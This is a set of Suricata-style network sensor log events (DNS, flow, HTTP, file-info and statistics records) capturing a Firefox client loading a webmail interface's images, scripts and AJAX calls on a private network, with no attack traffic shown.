{"timestamp":"2020-02-29T00:23:13.921148+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":32775,"proto":"UDP","dns":{"type":"answer","id":57668,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:13.921148+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":32775,"proto":"UDP","dns":{"type":"answer","id":57668,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:14.000285+0000","flow_id":461862238728569,"event_type":"flow","src_ip":"192.168.10.130","src_port":34264,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2088,"bytes_toclient":1452,"start":"2020-02-29T00:22:04.110969+0000","end":"2020-02-29T00:22:09.135688+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:14.006648+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954}} {"timestamp":"2020-02-29T00:23:14.006648+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":14}} {"timestamp":"2020-02-29T00:23:14.040185+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":14}} {"timestamp":"2020-02-29T00:23:14.042385+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":8}} {"timestamp":"2020-02-29T00:23:14.042940+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":1}} {"timestamp":"2020-02-29T00:23:14.055569+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:23:14.056125+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} {"timestamp":"2020-02-29T00:23:14.056812+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:23:14.057009+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":9}} {"timestamp":"2020-02-29T00:23:14.057388+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":2}} {"timestamp":"2020-02-29T00:23:14.057826+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:23:14.058591+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} {"timestamp":"2020-02-29T00:23:14.059277+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":3}} {"timestamp":"2020-02-29T00:23:14.060224+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":10}} {"timestamp":"2020-02-29T00:23:14.061891+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:23:14.062479+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":11}} {"timestamp":"2020-02-29T00:23:14.063474+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":15}} {"timestamp":"2020-02-29T00:23:14.101269+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:23:14.105302+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:23:14.105284+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:23:17.000362+0000","event_type":"stats","stats":{"uptime":15049,"capture":{"kernel_packets":140100,"kernel_drops":0},"decoder":{"pkts":140123,"bytes":96193959,"invalid":195,"ipv4":138552,"ipv6":10,"ethernet":140123,"raw":0,"null":0,"sll":0,"tcp":133002,"udp":5340,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2879,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2895,"synack":2886,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1896,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2443,"failed_udp":116},"tx":{"http":4909,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2525}},"flow_mgr":{"closed_pruned":2854,"new_pruned":17,"est_pruned":2504,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":6,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65529,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17848,"memcap_state":0,"memcap_global":0},"http":{"memuse":139487,"memcap":0}}} {"timestamp":"2020-02-29T00:23:18.000476+0000","flow_id":706061179386444,"event_type":"flow","src_ip":"192.168.10.122","src_port":55199,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:17.555596+0000","end":"2020-02-29T00:18:17.664296+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:18.576630+0000","flow_id":1779901807041841,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52976,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":0}} {"timestamp":"2020-02-29T00:23:19.062979+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":12}} {"timestamp":"2020-02-29T00:23:19.064032+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":4}} {"timestamp":"2020-02-29T00:23:19.066893+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":16}} {"timestamp":"2020-02-29T00:23:20.000471+0000","flow_id":65256369099473,"event_type":"flow","src_ip":"192.168.10.130","src_port":34270,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":33,"pkts_toclient":62,"bytes_toserver":3563,"bytes_toclient":80705,"start":"2020-02-29T00:22:11.398033+0000","end":"2020-02-29T00:22:16.434766+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:20.453231+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35494,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21489,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:20.561932+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35494,"proto":"UDP","dns":{"type":"answer","id":21489,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:20.561932+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35494,"proto":"UDP","dns":{"type":"answer","id":21489,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:20.668550+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412}} {"timestamp":"2020-02-29T00:23:20.668550+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:23:23.000290+0000","flow_id":574334532723092,"event_type":"flow","src_ip":"192.168.10.122","src_port":36137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:22.074132+0000","end":"2020-02-29T00:18:22.182286+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:23.000546+0000","flow_id":773543705896811,"event_type":"flow","src_ip":"192.168.10.122","src_port":59659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:22.255851+0000","end":"2020-02-29T00:18:22.365114+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:24.000208+0000","event_type":"stats","stats":{"uptime":15056,"capture":{"kernel_packets":140139,"kernel_drops":0},"decoder":{"pkts":140146,"bytes":96197273,"invalid":195,"ipv4":138573,"ipv6":10,"ethernet":140146,"raw":0,"null":0,"sll":0,"tcp":133021,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2505,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":40078,"memcap":0}}} {"timestamp":"2020-02-29T00:23:25.669546+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52980,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":0}} {"timestamp":"2020-02-29T00:23:31.000213+0000","event_type":"stats","stats":{"uptime":15063,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} 